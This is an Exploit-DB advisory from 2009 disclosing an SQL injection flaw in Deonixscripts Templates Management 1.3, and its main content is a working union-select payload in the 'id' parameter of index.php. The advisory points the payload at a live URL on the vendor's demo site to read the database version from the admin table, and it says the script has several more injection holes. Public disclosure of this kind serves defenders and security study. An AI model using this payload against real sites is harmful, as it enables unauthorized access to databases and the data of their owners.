Deonixscripts Templates Management 1.3 - SQL Injection

EDB-ID:

9251

CVE:

N/A


Author:

d3b4g

Type:

webapps


Platform:

PHP

Date:

2009-07-24


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

--------------------------------------------------------------------------
Deonixscripts Templates Management Version 1.3 SQL Injection Vulnerability

--------------------------------------------------------------------------
 ###################################################
 [+] Author        :  d3b4g
 [+] Email         :  bl4ckend[at]gmail.com
 [+] Twitter       :  twitter.com/schaba
 [+] Vulnerability :  SQL injection
 ###################################################

 () about script:- Web Templates management System allows you to start your own
    Web design business in no time by providing you with an impressive list of 
    features. You can sell individual templates (exclusive or recurring sale) or 
    offer free download to registered members by offering them with free or paid 
    membership. 
 

----------------------------------------------------------------------------------
 () Vulnerability demo :- http://www.site.com/path/index.php?action=readmore&id=(SQL c0de)

 () Live demo :- http://www.deonixscripts.com/demo/tplmgt13/index.php?action=readmore&id=-1+union+select+1,version(),3,4+from+admin--



  # note :- This script is pr0n to multiple sql injection vuln.


 #####################################################
 From Tiny little island of Maldivies

# milw0rm.com [2009-07-24]